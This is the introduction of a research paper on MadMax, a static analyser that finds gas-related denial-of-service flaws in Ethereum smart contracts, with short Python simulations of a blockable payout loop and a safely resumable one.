Ethereum is a decentralized blockchain platform that can execute arbitrarily-expressive computational smart contracts. Developers typically write smart contracts in a high-level language that a compiler translates into immutable low-level EVM bytecode for a persistent distributed virtual machine. Smart contracts handle transactions in Ether, a cryptocurrency with a current market capitalization in the tens of billions of dollars. Smart contracts (as opposed to non-computational “wallets”) hold a considerable portion of the total Ether available in circulation, which makes them ripe targets for attackers. Hence, developers and auditors have a strong incentive to make extensive use of various tools and programming techniques that minimize the risk of their contract being attacked.

Analysis and verification of smart contracts is, therefore, a high-value task, possibly more so than in any other programming setting. The combination of monetary value and public availability makes the early detection of vulnerabilities a task of paramount importance. (Detection may occur after contract deployment. Despite the code immutability, which prevents bug fixes, discovering a vulnerability before an attacker may exploit it could enable a trusted party to move vulnerable funds to safety.)

A broad family of contract vulnerabilities concerns out-of-gas behavior. Gas is the fuel of computation in Ethereum. Due to the massively replicated execution platform, wasting the resources of others is prevented by charging users for running a contract. Each executed instruction costs gas, which is traded with the Ether cryptocurrency. Since a user pays gas upfront, a transaction’s computation may exceed its allotted amount of gas. As a consequence, the Ethereum Virtual Machine (EVM) raises an out-of-gas exception and aborts the transaction. A contract that does not correctly handle the possible abortion of a transaction is at risk for a gas-focused vulnerability. Typically, a vulnerable smart contract will be blocked forever due to the incorrect handling of out-of-gas conditions: re-executing the contract’s function will fail to make progress, re-yielding out-of-gas exceptions, indefinitely. Thus, a contract is susceptible to, effectively, denial-of-service attacks, locking its balance away.
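The blocking behavior described above can be illustrated with a small simulation. This is only a sketch under stated assumptions, not EVM code: the `NaivePayout` class, the `OutOfGas` exception, and the flat `GAS_PER_ITERATION` cost are all hypothetical names and numbers chosen for illustration. It shows how a loop over a list that anyone can grow eventually exceeds any fixed gas allowance, after which every retry aborts at the same point and makes no progress.

```python
class OutOfGas(Exception):
    """Raised when a simulated call exceeds its gas allowance."""


# Hypothetical flat cost per payout; real EVM costs vary per instruction.
GAS_PER_ITERATION = 10_000


class NaivePayout:
    """Toy contract whose payout loop grows with every registration."""

    def __init__(self):
        self.investors = []
        self.paid = []

    def register(self, address):
        # Anyone may append, so an attacker can grow the list at will.
        self.investors.append(address)

    def pay_all(self, gas_limit):
        gas_left = gas_limit
        paid_this_call = []
        for address in self.investors:
            if gas_left < GAS_PER_ITERATION:
                # The transaction aborts and its partial work is discarded,
                # mimicking the state revert of an out-of-gas exception.
                raise OutOfGas(f"aborted after {len(paid_this_call)} payouts")
            gas_left -= GAS_PER_ITERATION
            paid_this_call.append(address)
        # Only a call that completes the whole loop commits its effects.
        self.paid.extend(paid_this_call)


contract = NaivePayout()
for i in range(5):
    contract.register(f"honest-{i}")
contract.pay_all(gas_limit=100_000)       # 5 payouts fit in the allowance

for i in range(10):
    contract.register(f"attacker-{i}")    # list now needs 150,000 gas

for _ in range(3):
    try:
        contract.pay_all(gas_limit=100_000)
    except OutOfGas:
        pass                              # every retry fails the same way
```

Because the loop always restarts from the first element, retrying with the same allowance can never succeed once the list is long enough, which is the "blocked forever" situation the paragraph describes.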

In this work, we present MadMax: a static program analysis framework for detecting gas-focused vulnerabilities in smart contracts. MadMax is a static analysis pipeline consisting of a decompiler (from low-level EVM bytecode to a structured intermediate language) and a logic-based analysis specification producing a high-level program model. MadMax is highly efficient and effective: it analyzes the whole Ethereum blockchain in 10 hours and reports numerous vulnerable contracts holding a total value exceeding $2.8B, with high precision, as determined from a random sample.

MadMax is unique in the landscape of smart contract analyzers and verifiers. (Section 7 contains a more detailed treatment of related work.) It is an approach employing cutting-edge static program analysis techniques (e.g., data-flow analysis together with context-sensitive flow analysis and memory layout modeling for data structures), whereas past analyzers have primarily focused on symbolic execution or full-fledged verification for functional correctness. As MadMax demonstrates, static program analysis offers a unique combination of advantages: very high scalability, universal applicability, and high coverage of potential vulnerabilities.

We speculate that past approaches have not employed static analysis techniques due to three main reasons: a) the belief that the thoroughness of static analysis is unnecessary for smart contracts since they are small in size; b) the possibility that static analysis, although thorough, can yield a high number of false positives (full-fledged, less automated verification techniques may be necessary); and c) the difficulty of applying static analysis techniques uniformly, at a low level: decompiling the low-level EVM bytecode into a manageable representation is a non-trivial challenge.

MadMax addresses or disproves these objections. It provides an effective decompilation substrate for analyzing low-level EVM bytecode. MadMax exhibits high precision, due to the sophisticated modeling of the gas-focused concepts it examines. Finally, our study of the Ethereum blockchain (and the subsequent application of MadMax to it) reveals that smart contracts can significantly benefit from static analysis. Figure 1 gives an early indication, by plotting smart contract size against the Ether held. We can see that relatively complex contracts (measured in the number of basic blocks) contain most of the Ether. Hence, the potential risk compounds for sophisticated smart contracts because complex contracts are harder to get right. This observation strongly supports the use of static program analysis, which scales well to relatively complex programs.

The main contributions of our work are:

●  Validation: We validate the approach for all 6.3 million contracts deployed on the entire blockchain. To our knowledge, no other work in the smart contract security literature has performed program analysis on such a number of contracts. Our analysis does not require source code to run, nor external input, and at the same time is highly scalable. The analysis reports vulnerabilities for contracts holding a total value of over $2.8B. Even though it is uncertain whether most vulnerabilities are real and how easily exploitable they might be, manual inspection of a small sample reveals over 80% precision and the existence of specific issues, which we detail.

●  A decompiler from EVM bytecode to structured low-level IR: We propose the use of static program analysis directly on the EVM bytecode. Analyzing EVM bytecode is challenging due to the stack-based low-level nature of the EVM with minimal control-flow structures.

●  The identification of gas-focused vulnerabilities: The semantics of limited, gas-based execution on top of smart contracts handling monetary transactions introduces a new class of vulnerabilities that does not occur in other programming language paradigms. We identify out-of-gas vulnerabilities thoroughly and explain their essence.

●  Abstractions for high-level data-structures and program constructs: We construct high-level abstractions for EVM bytecode for bridging the gap between the low-level EVM and the high-level vulnerabilities. We express analysis concepts that include safely resumable loops, data structures whose size increases in repeat invocations of public functions, and recognition of nested dynamic structures in low-level memory.
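The notion of a safely resumable loop mentioned in the last contribution can be sketched as follows. This is an illustrative simulation only, not the paper's formal definition and not EVM code: `ResumablePayout`, `next_index`, and the flat `GAS_PER_ITERATION` cost are hypothetical. The idea shown is that the loop checks its remaining allowance before each step and persists a cursor, so a later call continues where the previous one stopped instead of restarting.

```python
# Hypothetical flat cost per payout; real EVM costs vary per instruction.
GAS_PER_ITERATION = 10_000


class ResumablePayout:
    """Toy contract whose payout loop can be continued across calls."""

    def __init__(self, investors):
        self.investors = list(investors)
        self.next_index = 0   # cursor kept in persistent state between calls
        self.paid = []

    def pay_some(self, gas_limit):
        """Pay as many investors as the allowance permits.

        Returns True once every investor has been paid.
        """
        gas_left = gas_limit
        while (self.next_index < len(self.investors)
               and gas_left >= GAS_PER_ITERATION):
            self.paid.append(self.investors[self.next_index])
            self.next_index += 1          # progress survives this call
            gas_left -= GAS_PER_ITERATION
        return self.next_index == len(self.investors)


contract = ResumablePayout([f"investor-{i}" for i in range(15)])
first_done = contract.pay_some(gas_limit=100_000)    # pays the first 10
second_done = contract.pay_some(gas_limit=100_000)   # pays the remaining 5
```

Each call stops before the allowance is exhausted rather than aborting, so growing the list only increases the number of calls needed and cannot block the contract outright.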
